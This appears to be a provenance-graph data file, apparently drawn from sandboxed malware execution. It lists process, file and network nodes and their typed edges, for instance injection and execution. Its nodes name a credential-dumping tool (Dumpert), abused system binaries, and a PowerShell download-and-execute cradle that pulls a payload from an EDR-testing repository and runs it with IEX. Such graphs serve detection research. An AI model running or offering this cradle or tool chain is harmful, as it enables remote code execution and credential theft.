19
MP*-msxsl.exe
MP*-Outflank-Dumpert.exe
TF-\Users\admin\AppData\Local\Temp\863e7c22c771e4005197ae28363584f8.exe
MP-ns9F46.tmp
MP*-AcroRd32.exe 
TP*-7za.exe
SO-http://gc2siv9geletsu4.orgweave.com/bXRpQG10aS5odQ
MF-\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe
TP-z9673002.exe
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
MF-basitsanas.c
SO-appcenter://generic?aid=a7417433-29d9-4bc0-8826-af367733939d&iid=ad142ee9-ecfe-4580-ec0f-259fb963ccd2&uid=ad142ee9-ecfe-4580-ec0f-259fb963ccd2
SF-C:\Users\admin\AppData\Local\Temp\NP232375OF1V04LRD3C096_EAWB
MF-C:\Users\admin\AppData\Local\Temp\CareUEyes_setup
MF-Firefox\default-browser-agent.exe
SF-C:\Users\admin\AppData\Local\Temp\splwow64
SF-C:\Users\admin\AppData\Local\Temp\suifsc.exe
MP-Entry.exe 
MP-conhost.exe
30
0 1 FR-1
0 2 WR-1
1 2 CD-2
0 3 FR-1
1 3 UK-2
0 4 FR-1
4 2 WR-3
0 5 FR-1
5 2 WR-4
4 5 UK-3
6 0 RF-1
0 7 WR-1
0 8 IJ-1
8 2 WR-4
8 6 ST-4
8 7 WR-4
0 9 ST-1
8 9 ST-4
0 10 CD-1
8 10 WR-4
8 11 ST-4
8 12 EX-4
8 13 WR-4
8 14 WR-4
8 15 WR-4
8 16 CD-4
17 7 RD-4
8 17 UK-4
9 18 RF-4
18 10 UK-4

